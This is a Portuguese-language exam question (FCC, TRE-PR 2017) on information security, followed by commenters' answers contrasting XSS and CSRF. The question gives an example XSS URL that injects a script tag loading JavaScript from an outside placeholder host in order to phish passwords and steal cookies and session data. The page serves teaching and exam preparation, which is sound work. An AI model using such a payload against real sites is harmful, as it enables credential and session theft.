SóProvas


ID
2519458
Banca
FCC
Órgão
TRE-PR
Ano
2017
Provas
Disciplina
Segurança da Informação
Assuntos

Considere uma aplicação em que um usuário efetua o login e, posteriormente, é redirecionado para uma tela principal. Isto poderia acontecer por meio de uma URL como a seguinte:


              http://www.aplicacaoweb.com.br/Default.aspx?usuario=idusuario


Nesta URL, idusuario indica a conta com a qual o usuário se autenticou no website.


Suponha, agora, que o usuário USER acessou a aplicação e não fez o logoff de sua sessão enquanto estava ativa. Após certo tempo, o usuário USER recebe um e-mail no qual um hacker se faz passar pela empresa que mantém o website. O e-mail fornece um link disfarçado que redireciona USER para uma URL como esta:


http://www.aplicacaoweb.com.br/Default.aspx?usuario=idusuario<script

src='http://sitedesconhecido.com/ataque.js'>solicitarSenha();</script>  


Note que o parâmetro usuario contém também uma referência para um arquivo Javascript localizado em outro website. Caso USER clique no link, o código existente no endereço externo solicitaria que ele informasse novamente sua senha e, em caso afirmativo, o atacante receberia a informação desejada, podendo também roubar outras informações presentes em cookies e na sessão ativa naquele instante.


A situação apresentada configura um ataque do tipo 

Alternativas
Comentários
  • e)

    Cross-Site Scripting (XSS). 

  • Cross-site scripting (XSS) é um tipo de vulnerabilidade do sistema de segurança de um computador, encontrado normalmente em aplicações web que activam ataques maliciosos ao injectarem client-side script dentro das páginas web vistas por outros usuários. Um script de exploração de vulnerabilidade cross-site pode ser usado pelos atacantes para escapar aos controles de acesso que usam a política de mesma origem.

     

     

    https://pt.wikipedia.org/wiki/Cross-site_scripting

  • Normalmente eu confundo CSRF e XSS.

     

    Alguém tem algum esquema para diferenciá-los melhor?

  • Fala Sávio, achei essas diferenças em um site gringo, (Atradução esta livre)

    "Em um ataque de falsificação de solicitação de cross-site CSRF , o atacante tenta forçá-lo / enganá-lo a fazer um pedido que você não pretendia. Isso poderia estar lhe enviando um link que o faz involuntariamente alterar sua senha.
    Em um ataque de script cross-site XSS , o atacante faz você involuntariamente executar o código do lado do cliente, provavelmente o Javascript.
    Ambos os ataques têm em comum que eles são ataques do lado do cliente e precisam de alguma forma de atividade do usuário (por exemplo, clicando em um link ou visitando um site). Ao contrário das vulnerabilidades RFI ou SQLi , você está atacando um usuário e não o servidor. O XSS geralmente é mais poderoso do que o CSRF porque geralmente permite a execução de código de script arbitrário, enquanto o CSRF é restrito a uma ação específica (por exemplo, alterando a senha)"

    Retirando as principais palavras dá pra fazer um bom resumo! Abraços

  • L.A L.O,

     

    Obrigado.

  • Fonte da resposta do LALO:

    https://security.stackexchange.com/questions/138987/difference-between-xss-and-csrf

  • Ataque XSS -> Script no navegador

    Ataque CSRF -> Altera requisições no servidor ( POST E GET ) são usados.

  • Cross Site Request Forgery (CSRF): Explora a confiança que um site tem no navegador de um usuário. O atacante age no navegador web do usuário autenticado (lado cliente) para que este envie requisições HTTP forjadas.

    Cross-Site Scripting (XSS): Explora a confiança que um usuário tem para um site específico. O atacante age nos servidores web vulneráveis (lado servidor) injetando códigos maliciosos (JavaScript, por exemplo) que serão executados no lado cliente (navegador web).

    Fonte: Meus resumos.